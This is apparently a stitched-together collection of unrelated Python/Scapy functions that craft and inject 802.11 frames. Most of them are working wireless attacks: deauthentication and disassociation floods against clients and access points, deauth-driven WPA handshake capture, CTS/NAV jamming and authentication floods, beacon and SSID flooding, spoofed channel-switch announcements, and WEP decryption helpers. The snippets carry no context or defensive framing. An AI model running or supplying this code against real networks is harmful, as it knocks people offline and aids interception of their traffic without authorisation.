def deBuilder(self, packet, stream, genFCS): """Return the decrypted packet""" ## Remove the FCS from the old packet body postPkt = RadioTap(self.pt.byteRip(packet.copy(), chop = True, order = 'last', output = 'str', qty = 4)) ## Remove RadioTap() info if required if genFCS is False: postPkt = RadioTap()/postPkt[RadioTap].payload ## Rip off the Dot11WEP layer del postPkt[Dot11WEP] ## Add the stream to LLC decodedPkt = postPkt/LLC(str(stream)) ## Flip FCField bits accordingly if decodedPkt[Dot11].FCfield == 65: decodedPkt[Dot11].FCfield = 1 elif decodedPkt[Dot11].FCfield == 66: decodedPkt[Dot11].FCfield = 2 ## Return the decoded packet with or without FCS if genFCS is False: return decodedPkt else: return decodedPkt/Padding(load = binascii.unhexlify(self.pt.endSwap(hex(crc32(str(decodedPkt[Dot11])) & 0xffffffff)).replace('0x', '')))
def shoot(self, tgt): self.__c_TGT = tgt sniffer_thread = threading.Thread(target=self.start_eapol_sniffer) sniffer_thread.daemon = True sniffer_thread.start() while not self.__SNIFFER_STATUS: time.sleep(1) __pkt_to_cl = RadioTap() / Dot11( addr1=tgt, addr2=self.bssid, addr3=self.bssid) / Dot11Deauth(reason=7) __pkt_to_ap = RadioTap() / Dot11( addr1=self.bssid, addr2=tgt, addr3=tgt) / Dot11Deauth(reason=7) for n in range(32 * 1): sendp(__pkt_to_cl, iface=self.iface, count=1, verbose=False) sendp(__pkt_to_ap, iface=self.iface, count=1, verbose=False) while self.__SNIFFER_STATUS: time.sleep(1) self.__SNIFFER_STATUS = not bool(self.__SNIFFER_STATUS) if self.verify_handshake(tgt): return (True, self.__c_HANDSHAKE) else: return (False, [])
def close(self): """ Disassociate from the access point, This does not veify that the AP received the message and should be considred a best-effort attempt. errDict = { -1:"Not Connected", 0:"No Error" } """ if not self.connected: return -1 sendp(RadioTap() / Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=0, subtype=12) / Dot11Disas(reason=3), iface=self.interface, verbose=False) sendp(RadioTap() / Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=0, subtype=12) / Dot11Disas(reason=3), iface=self.interface, verbose=False) self.connected = False return 0
def send_beacon_ex(essid, interface, privacy=PRIVACY_NONE, bssid=None, channel=6): """ Convenience function for sending beacons without a thread or creating an instance """ if not bssid: bssid = getHwAddr(interface) channel = chr(channel) sequence = randint(1200, 2000) if privacy in [PRIVACY_NONE, 'none', 'NONE']: beacon = ( RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence) / Dot11Beacon(cap='ESS+short-preamble+short-slot') / Dot11Elt(ID="SSID", info=essid) / Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') / Dot11Elt(ID="DSset", info=channel) / Dot11Elt(ID=42, info="\x04") / Dot11Elt(ID=47, info="\x04") / Dot11Elt(ID=50, info="\x0c\x12\x18\x60")) elif privacy in [PRIVACY_WEP, 'wep', 'WEP']: beacon = ( RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence) / Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot') / Dot11Elt(ID="SSID", info=essid) / Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') / Dot11Elt(ID="DSset", info=channel) / Dot11Elt(ID=42, info="\x04") / Dot11Elt(ID=47, info="\x04") / Dot11Elt(ID=50, info="\x0c\x12\x18\x60")) elif privacy in [PRIVACY_WPA, 'wpa', 'WPA']: beacon = ( RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence) / Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot') / Dot11Elt(ID="SSID", info=essid) / Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') / Dot11Elt(ID="DSset", info=channel) / Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01") / Dot11Elt(ID=42, info="\x00") / Dot11Elt(ID=50, info="\x30\x48\x60\x6c") / Dot11Elt( ID=221, info= "\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00" )) else: raise Exception('Invalid privacy setting') sendp(beacon, iface=interface, verbose=False)
def deauth(self, e): global SEQ_NUM pkts = [] deauth_pkt1 = RadioTap() / Dot11(addr1=self.client_mac, addr2=self.ap_mac, addr3=self.ap_mac) / Dot11Deauth() deauth_pkt2 = RadioTap() / Dot11( addr1=self.ap_mac, addr2=self.client_mac, addr3=self.client_mac) / Dot11Deauth() ''' Channel Switch Announcement + Dot11 \x0d Action + Raw \x00 Management \x04 CSA \x25 Element ID [37] \x03 Length \x00 Channel Switch Mode \x04 New Channel Num \x00 Channel Switch Count ''' csa_pkt = RadioTap() / Dot11( addr1=self.client_mac, addr2=self.ap_mac, addr3=self.ap_mac, type=0, subtype=0x0d) / Raw("\x00\x04\x25\x03\x00" + chr(self.client_channel) + "\x00") #csa_pkt = Jammer.append_csa(self.my_beacon, 56) pkts.append(deauth_pkt1) pkts.append(deauth_pkt2) pkts.append(csa_pkt) deauth_pkt1[RadioTap].notdecoded = deauth_pkt1[ RadioTap].notdecoded[:10] + channels[ self.ap_channel] + deauth_pkt1[RadioTap].notdecoded[12:] deauth_pkt1[RadioTap].notdecoded = deauth_pkt1[ RadioTap].notdecoded[:10] + channels[ self.ap_channel] + deauth_pkt1[RadioTap].notdecoded[12:] logger.log("Starting deauth on AP [G]" + self.ap_mac + "[/G] (" + self.ap_ssid + ") and client [G]" + self.client_mac + "[/G]...") while not e.isSet(): for p in pkts: SEQ_NUM += 1 p[RadioTap].SC = SEQ_NUM p[Dot11].FCfield |= 0x20 sendp(p, iface=self.iface_ap, inter=0.1 / len(pkts)) logger.log("Deauth [G]stopped[/G]")
def setPrivacy(self, value): """ Configure the privacy settings for None, WEP, and WPA """ if value == PRIVACY_NONE: self.beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11Beacon(cap='ESS+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=self.essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60") elif value == PRIVACY_WEP: self.beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=self.essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60") elif value == PRIVACY_WPA: self.beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=self.essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/Dot11Elt(ID=42, info="\x00")/Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
def forge_ap_cl(self): _pkt_ap = RadioTap() / Dot11(addr1=self.cl, addr2=self.ap, addr3=self.ap) / Dot11Deauth(reason=7) _pkt_cl = RadioTap() / Dot11(addr1=self.ap, addr2=self.cl, addr3=self.cl) / Dot11Deauth(reason=7) if self.unlimited: while True: self.flood_ap_cl(_pkt_ap, _pkt_cl) else: for _count in range(0, self.count): self.flood_ap_cl(_pkt_ap, _pkt_cl)
def perform_deauth(router, client, iface): pckt = RadioTap() / Dot11(addr1=client, addr2=router, addr3=router) / Dot11Deauth(reason=4) cli_to_ap_pckt = RadioTap() / Dot11(addr1=router, addr2=client, addr3=client) / Dot11Deauth(reason=7) print('Sending Deauth to ' + client + ' from ' + router) try: for i in range(100): sendp(pckt, inter=0.1, count=1, loop=0, iface=iface, verbose=0) sendp(cli_to_ap_pckt, inter=0.1, count=1, loop=0, iface=iface, verbose=0) print("\U0001F608") except Exception as e: print(f"error: {e}")
def start(): ap = args.bssid client = args.client pkt = RadioTap()/Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth() pkt1 = RadioTap()/Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth() for n in range(int(args.number)): sendp(pkt, iface=args.iface, verbose=0) print("Send deauth packet: " + termcolor(ap, "green") + " (ap) > " + termcolor(client, "blue") + " (client) via " + termcolor(args.iface, "red") + " #" + str(n + 1)) sleep(0.5) sendp(pkt1, iface=args.iface, verbose=0) print("Send deauth packet: " + termcolor(client, "blue") + " (client) > " + termcolor(ap, "green") + " (ap) via " + termcolor(args.iface, "red") + " #" + str(n + 1))
def shoot(self, _sn, _rc): _pkt_ap_to_cl = RadioTap() / Dot11(addr1=_rc, addr2=_sn, addr3=_sn) / Dot11Deauth(reason=7) _pkt_cl_to_ap = RadioTap() / Dot11(addr1=_sn, addr2=_rc, addr3=_rc) / Dot11Deauth(reason=7) sendp(_pkt_ap_to_cl, iface=self.iface, count=self.deauth, verbose=False) sendp(_pkt_cl_to_ap, iface=self.iface, count=self.deauth, verbose=False) time.sleep(0.80)
def sa_query_attack(interface, ap, sta): pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \ Dot11Auth(algo=0, seqnum=0x0001, status=0x0000) interface.inject(pkt) pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \ Dot11AssoReq(cap=0x3104, listen_interval=0x0001) / Dot11Elt(ID=0, info="Wireless Attack Testbed") / \ Dot11EltRates() / Dot11Elt(ID='RSNinfo', info=( '\x01\x00' # RSN Version 1 '\x00\x0f\xac\x04' # Group Cipher Suite : 00-0f-ac CCMP '\x01\x00' # 2 Pairwise Cipher Suite (next line) '\x00\x0f\xac\x04' # AES Cipher '\x01\x00' # 1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' # Pre-Shared Key '\x80\x00')) # Supports MFP interface.inject(pkt)
def deBuilder(self, tgtPkt, decrypted): """Return the decrypted packet""" ## This is our encrypted data we need to remove eData = self.pt.byteRip(tgtPkt[Dot11WEP].wepdata, qty=4, chop=True) ## This is our decrypted everything, LLC included dEverything = self.pt.byteRip(decrypted, qty=16, order='last', chop=True) ## Prep the new pkt newPkt = tgtPkt.copy() del newPkt[Dot11WEP].wepdata ## Remove the last four bytes of new pkt and unhexlify postPkt = RadioTap((self.pt.byteRip(newPkt.copy(), chop=True, order='last', output='str', qty=4))) del postPkt[Dot11WEP] ## The data is proper in here finalPkt = postPkt.copy() / LLC( binascii.unhexlify(dEverything.replace(' ', ''))) ## Flip FCField bits accordingly if finalPkt[Dot11].FCfield == 65L: finalPkt[Dot11].FCfield = 1L elif finalPkt[Dot11].FCfield == 66L: finalPkt[Dot11].FCfield = 2L ## Calculate and append the FCS crcle = crc32(str(finalPkt[Dot11])) & 0xffffffff if sys.byteorder == "little": ## Convert to big endian crc = struct.pack('<L', crcle) ## Convert to long (fcsstr, ) = struct.unpack('!L', crc) ### Need to research which NIC causes /Raw(fcs) to be needed #fcs = bytearray.fromhex('{:32x}'.format(fcsstr)) #return finalPkt/Raw(fcs) return finalPkt
def get_rsn_information(self, essid): rsnInfo = None sendp(RadioTap() / Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), subtype=4) / Dot11ProbeReq() / Dot11Elt(ID=0, info=essid) / Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') / Dot11Elt(ID=50, info='\x0c\x12\x18\x60'), iface=self.interface, verbose=False) self.sequence += 1 sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__) if self.lastpacket is None or not self.lastpacket.haslayer( Dot11ProbeResp): return None probeResp = self.lastpacket.getlayer(Dot11ProbeResp) tmp = probeResp.getlayer(Dot11Elt) while tmp: if tmp.fields.get('ID') == 48: rsnInfo = tmp break else: tmp = tmp.payload if rsnInfo is None: rsnInfo = '' # Did not find rsnInfo in probe response. else: rsnInfo = build_rsn_data(parse_rsn_data(rsnInfo.info)) rsnInfo = '\x30' + chr(len(rsnInfo)) + rsnInfo return rsnInfo
def asso_frame_blueprint(self, ap, cl): capibility = self.beacon.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}") efields = self.enumerate_asso_fields(self.beacon) return RadioTap() / Dot11(addr1=ap, addr2=cl, addr3=ap) / Dot11AssoReq(cap=capibility, listen_interval=3) / \ Dot11Elt(ID=efields[0]['ID'], len=efields[0]['len'], info=efields[0]['info']) / \ Dot11Elt(ID=efields[1]['ID'], len=efields[1]['len'], info=efields[1]['info']) / \ Dot11Elt(ID=efields[48]['ID'], len=efields[48]['len'], info=efields[48]['info'])
def test_new_packet(self): """ Tests the 'new_packet' method. """ config = Config() new_packets = Queue() sniffer = PacketSniffer(config, new_packets) self.assertEqual(sniffer.new_packets.qsize(), 0) packet = RadioTap() \ / Dot11( addr1="ff:ff:ff:ff:ff:ff", addr2="aa:bb:cc:11:22:33", addr3="dd:ee:ff:11:22:33" ) \ / Dot11ProbeReq() \ / Dot11Elt( info="Test" ) sniffer.new_packet(packet) self.assertEqual(sniffer.new_packets.qsize(), 1) ProbeRequestParser.parse(sniffer.new_packets.get(timeout=1))
def ssidFlood(ssid, senderMAC, channel): dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=senderMAC, addr3=senderMAC) beacon = Dot11Beacon(cap="ESS+privacy") essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) echann = Dot11Elt(ID="DSset", info=chr(channel)) frame = RadioTap()/dot11/beacon/essid/echann sendp(frame, inter=0.1, iface=args.iface, verbose=False, loop=1)
def pp_deauth(blacklist): """ Starts deauthentication attack for PineAP Suite. """ os.system("reset") print "\033[1m" + banner_dos print colored( "\n------------------- ̿' ̿'\̵͇̿̿\з=(◕_◕)=ε/̵͇̿̿/'̿'̿ ---------------------\n̿", "red") print "\033[1m[--] TARGET(s): ", blacklist time.sleep(1) print "\033[1m[*] Deauthing PineAP client devices" time.sleep(2) print "\033[1m[*] Channel number being set\n" time.sleep(2) for d in blacklist: clist = sniff(iface=iface, count=30) channel = find_channel(clist, d) os.system("iwconfig wlan1mon channel " + str(channel)) print "\033[1m[*] Sending 120 deauthentication packets to ", d deauth = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=d.lower(), addr3=d.lower()) / Dot11Deauth() sendp(deauth, iface=iface, count=120, inter=.2, verbose=False) time.sleep(1) print "\033[1m[*] Attack completed" time.sleep(2)
def cts_nav_attack(interface): # http://matej.sustr.sk/publ/articles/cts-dos/cts-dos.en.html # pkt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', pkt = RadioTap() / Dot11(type=1, subtype=12, ID=0xff7f, addr1="00:00:de:ad:be:ef") while True: interface.inject(pkt) sleep(0.01)
def getRSNInformation(self, essid): sendp(RadioTap() / Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__unfuckupSC__(), subtype=4) / Dot11ProbeReq() / Dot11Elt(ID=0, info=essid) / Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') / Dot11Elt(ID=50, info='\x0c\x12\x18\x60'), iface=self.interface, verbose=False) self.sequence += 1 sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__) if self.lastpacket == None or not self.lastpacket.haslayer( 'Dot11ProbeResp'): return None probeResp = self.lastpacket.getlayer(Dot11ProbeResp) tmp = probeResp.getlayer(Dot11Elt) while tmp: if tmp.fields.get('ID') == 48: rsnInfo = tmp break else: tmp = tmp.payload if rsnInfo == None: rsnInfo = '' # we didn't find it in the probe response, so we'll return an empty string else: rsnInfo = parseRSNData(rsnInfo.info) rsnInfo = buildRSNData(rsnInfo) rsnInfo = '\x30' + chr(len(rsnInfo)) + rsnInfo return rsnInfo
def send_wpa_enc(self, data, iv, seqnum, dest, mic_key, key_idx=0, additionnal_flag=["from-DS"], encrypt_key=None): """Send an encrypted packet with content @data, using IV @iv, sequence number @seqnum, MIC key @mic_key """ if encrypt_key is None: encrypt_key = self.tk rep = RadioTap() rep /= Dot11( addr1=dest, addr2=self.mac, addr3=self.mac, FCfield="+".join(['wep'] + additionnal_flag), SC=(next(self.seq_num) << 4), subtype=0, type="Data", ) # Assume packet is send by our AP -> use self.mac as source # Encapsule in TKIP with MIC Michael and ICV data_to_enc = build_MIC_ICV(raw(data), mic_key, self.mac, dest) # Header TKIP + payload rep /= Raw(build_TKIP_payload(data_to_enc, iv, self.mac, encrypt_key)) self.send(rep) return rep
def search_n_destroy(iface: str): setup_monitor(iface) pkts_stream = sniff_gen(iface=iface) for pkt in pkts_stream: if UDP in pkt: dgram = pkt[UDP] if dgram.dport == 5555: frame = ( RadioTap() / Dot11FCS( subtype=8, type="Data", proto=0, FCfield="to-DS", addr1=pkt[Dot11].addr1, addr2=pkt[Dot11].addr2, addr3=pkt[Dot11].addr3, ) / Dot11QoS(Reserved=0, Ack_Policy=0, EOSP=0, TID=0, TXOP=0) / LLC(dsap=0xAA, ssap=0xAA, ctrl=3) / SNAP(OUI=0x0, code="IPv4") / IP(version=4, proto="udp", src=pkt[IP].src, dst=pkt[IP].dst) / UDP(sport=6666, dport=5555) / Raw(load=bytes.fromhex( "436d640001001200010404000a000000808080802020202010652f" ))) sendp(frame, iface=iface) break
def wpaEncrypt(encKey, origPkt, decodedPkt, PN, genFCS=True): """Encompasses the steps needed to encrypt a WPA packet No structure for TKIP has been done as of yet """ ## Increment the PN positively per IEEE spec PN[5] += 1 ## Grab the payload of the decoded packet dEverything = decodedPkt[LLC] ## Remove the FCS from the original packet newPkt = RadioTap((pt.byteRip(origPkt.copy(), chop=True, order='last', output='str', qty=4))) del newPkt[Dot11WEP] ## The data is ready for encryption newPkt = newPkt / dEverything encodedPkt = ccmpCrypto.encryptCCMP(newPkt, encKey, PN, genFCS) ## Flip FCField bits accordingly ### DEBUG # if encodedPkt[Dot11].FCfield == 1L: # encodedPkt[Dot11].FCfield = 65L # elif encodedPkt[Dot11].FCfield == 2L: # encodedPkt[Dot11].FCfield = 66L if encodedPkt[Dot11].FCfield == 1: encodedPkt[Dot11].FCfield = 65 elif encodedPkt[Dot11].FCfield == 2: encodedPkt[Dot11].FCfield = 66 return encodedPkt
def get_radiotap_header(self): radiotap_packet = RadioTap( len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(self.channel) + '\xc0\x00\xc0\x01\x00\x00') return radiotap_packet
def send_ctrl_msg(json_data: str, my_mac: str, mon_interface: str = 'mon0') -> None: a = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=my_mac, addr3="ff:ff:ff:ff:ff:ff") / json_data sendp(a, iface=mon_interface, verbose=0)
def trigger_channel_switch_in_device(self, iface, sta_mac_addr, target_channel, serving_channel, **kwargs): """ Transmit Channel Switch Announcement (CSA) beacon to the given STA. """ bssid = kwargs.get('bssid') self.log.debug( 'Sending CSA to {} on iface {}'.format(sta_mac_addr, iface), ' with BSSID {} switch STA to channel {}'.format( bssid, str(target_channel))) # tbd: clean up this mess data1 = ('3bc0904f0000000064000100000542494741500', '1088c129824b048606c0301') data2 = ('050400020000070c44452024081464051a84031a2d1a0c001bffff', '0000000000000000000001000000000000000000003d162c000400', '0000000000000000000000000000000000007f0800000000000000', '40dd180050f2020101800003a4000027a4000042435d0062322e00', 'dd06aaaaaa3f4325dd14aaaaaa8020544b4e2d4c6f57532d537973', '74656ddd06aaaaaa215a01250300') beacon = (RadioTap() / Dot11( type=0, subtype=8, addr1=sta_mac_addr, addr2=bssid, addr3=bssid) / binascii.unhexlify( data1 + hex(serving_channel).replace("0x", "") + data2 + hex(target_channel).replace("0x", "") + '00')) # tbd: do we really need this BEACON_ARQ = 3 for ii in range(BEACON_ARQ): # repetitive transmission sendp(beacon, iface=iface) return True
def __init__(self, interface, args): self.interface = interface self.args = args ## Create a header that works for encrypted wifi having FCS ### These bytes can be switched up, if memory serves, this is a channel 6 RadioTap() rTap = '00 00 26 00 2f 40 00 a0 20 08 00 a0 20 08 00 00 20 c8 af c8 00 00 00 00 10 6c 85 09 c0 00 d3 00 00 00 d2 00 cd 01' self.rTap = RadioTap(unhexlify(rTap.replace(' ', '')))
def _read_cmds_from_pcap(stream): for pkt in stream: if isinstance(pkt, Raw): pkt = RadioTap(pkt) if UDP in pkt: dgram = pkt[UDP] if dgram.dport == 5555: yield dgram
def auth_attack(interface, sta, ap): pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \ Dot11Auth(algo=0, seqnum=0x0001, status=0x0000) while True: cprint("ZZZ", 'blue') interface.inject(pkt) pkt.SC += 1 sleep(0.3)
def run(self, args, cmd): self.cmd = cmd with db_session: bss = cmd.select_bss(args.ssid, args.bssid, args.client) if bss: if not args.bssid: args.bssid = bss.bssid if args.channel is None: args.channel = bss.channel if args.bssid is None: cmd.perror("BSSID is missing, and couldn't be obtained from the recon db.") elif args.channel is None: cmd.perror("Channel is missing, and couldn't be obtained from the recon db.") else: interface = set_monitor_mode(args.iface) if args.channel > 0: check_chset(interface, args.channel) else: args.channel = pyw.chget(interface) deauth_frame = RadioTap() / Dot11(addr1=args.client, addr2=args.bssid, addr3=args.bssid) / Dot11Deauth( reason="class3-from-nonass") args.num_frames = "infinite" if args.num_frames <= 0 else args.num_frames * 64 if compare_macs(args.client, BROADCAST_MAC): cmd.pfeedback( "[i] Sending {} deauth frames to all clients from AP {} on channel {}...".format(args.num_frames, args.bssid, args.channel)) else: cmd.pfeedback( "[i] Sending {} deauth frames to client {} from AP {} on channel {}...".format(args.num_frames, args.client, args.bssid, args.channel)) if args.num_frames == "infinite": self.inf_running = True prev_sig_handler = signal.signal(signal.SIGINT, self.sig_int_handler) cmd.pfeedback("[i] Press ctrl-c to stop.") while self.inf_running: try: sendp(deauth_frame, iface=args.iface, count=64, inter=0.002) except: pass sleep(0.5) signal.signal(signal.SIGINT, prev_sig_handler) else: sendp(deauth_frame, iface=args.iface, count=args.num_frames, inter=0.002)
def connect(self, essid, rsnInfo=''): """ Connect/Associate with an access point. errDict = { -1:"Already Connected", 0:"No Error", 1:"Failed To Get Probe Response", 2:"Failed To Get Authentication Response", 3:"Failed To Get Association Response", 4:"Authentication Request Received Fail Response", 5:"Association Request Received Fail Response" } """ # Dot11 Probe Request (to get authentication information if applicable) payload = (RadioTap() / Dot11( addr1=self.dest_mac, addr2=self.source_mac, addr3=self.dest_mac) / Dot11Auth(seqnum=1)) self.__thread_sendp__(payload) if rsnInfo is None: # None explicitly means go get it, leave it '' to proceed with out it rsnInfo = self.get_rsn_information(essid) if self.lastpacket is None or not self.lastpacket.haslayer(Dot11Auth): return 2 if self.lastpacket.getlayer(Dot11Auth).status != 0: return 4 #Dot11 Association Request payload = (RadioTap() / Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), subtype=0) / Dot11AssoReq(cap='ESS+short-preamble+short-slot', listen_interval=10) / Dot11Elt(ID=0, info=essid) / Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') / Dot11Elt(ID=50, info='\x0c\x12\x18\x60') / rsnInfo) self.__thread_sendp__(payload) if self.lastpacket is None or not self.lastpacket.haslayer( Dot11AssoResp): return 3 if self.lastpacket.getlayer(Dot11AssoResp).status != 0: return 5 self.connected = True self.sequence = 0 return 0
def disassociate(self): # Forge the dot11 disassociation packet dis_packet = RadioTap()/Dot11(type=0, subtype=12, addr1=self.target_mac, addr2=self.other_mac, addr3=self.other_mac)/Dot11Deauth(reason=self.reason) # Loop to send the disassociation packets to the victim device while True: # Repeat every delay value seconds time.sleep(self.delay) print("["+str(datetime.now().time())+"][+] Disassociation frames (reason "+str(self.reason)+") sent to target "+self.target_mac+" as sender endpoint "+self.other_mac) sendp(dis_packet, iface=self.interface, count=self.num, verbose=False)
class ClientListener(threading.Thread): """ This object is a thread-friendly listener for Client connection attempts. The backlog corresponds to the size of the queue, if the queu is full because the items are not being handled fast enough then new association requests will be dropped and lost. """ def __init__(self, interface, backlog, essid = None, bssid = None): threading.Thread.__init__(self) self.interface = interface self.backlog = backlog self.essid = essid if not bssid: bssid = getHwAddr(interface) self.bssid = bssid.lower() self.lastpacket = None self.client_queue = Queue.Queue(self.backlog) # FIFO self.channel = "\x06" self.sequence = randint(1200, 2000) self.__shutdown__ = False def __unfuckupSC__(self, fragment = 0): """ This is a reserved method to return the sequence number in a way that is not f****d up by a bug in how the SC field is packed in Scapy. """ if self.sequence >= 0xFFF: self.sequence = 1 else: self.sequence += 1 SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4) # bit shifts FTW! return unpack('<H', pack('>H', SC))[0] def __stopfilter__(self, packet): """ This is the stop filter for Scapy to be used to check if the packet was sent to EAPeak. """ if (packet.haslayer('Dot11Auth') or packet.haslayer('Dot11AssoReq')): if getBSSID(packet) == self.bssid and getSource(packet) != self.bssid: self.lastpacket = packet return True return False elif packet.haslayer('Dot11ProbeReq'): self.lastpacket = packet return True return False def setPrivacy(self, value): """ Configure the privacy settings for None, WEP, and WPA """ if value == PRIVACY_NONE: self.probe_response_template = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11ProbeResp(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info='')/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60") elif value == PRIVACY_WEP: self.probe_response_template = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11ProbeResp(cap='ESS+short-preamble+short-slot')/Dot11Elt(ID="SSID",info='')/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60") elif value == PRIVACY_WPA: self.probe_response_template = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11ProbeResp(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info='')/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/Dot11Elt(ID=42, info="\x00")/Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00") def run(self): """ This is the thread routine that handles probe requests and sends probe responses when appropriate. """ while not self.__shutdown__: sniff(iface=self.interface, store=0, timeout=RESPONSE_TIMEOUT, stop_filter=self.__stopfilter__) if self.lastpacket: if self.lastpacket.haslayer('Dot11ProbeReq'): ssid = None # not to be confused with self.essid, they could be different and need to be evaluated tmp = self.lastpacket.getlayer(Dot11ProbeReq) while tmp: tmp = tmp.payload if tmp.fields['ID'] == 0: ssid = tmp.info break if ssid == None: continue elif ssid == '' and self.essid: ssid = self.essid if self.essid == None or self.essid == ssid: self.probe_response_template.getlayer(Dot11).addr1 = getSource(self.lastpacket) self.probe_response_template.getlayer(Dot11Elt).info = ssid sendp(self.probe_response_template, iface=self.interface, verbose=False) self.lastpacket = None continue clientMAC = getSource(self.lastpacket) if not self.client_queue.full(): self.client_queue.put(clientMAC, False) self.lastpacket = None continue
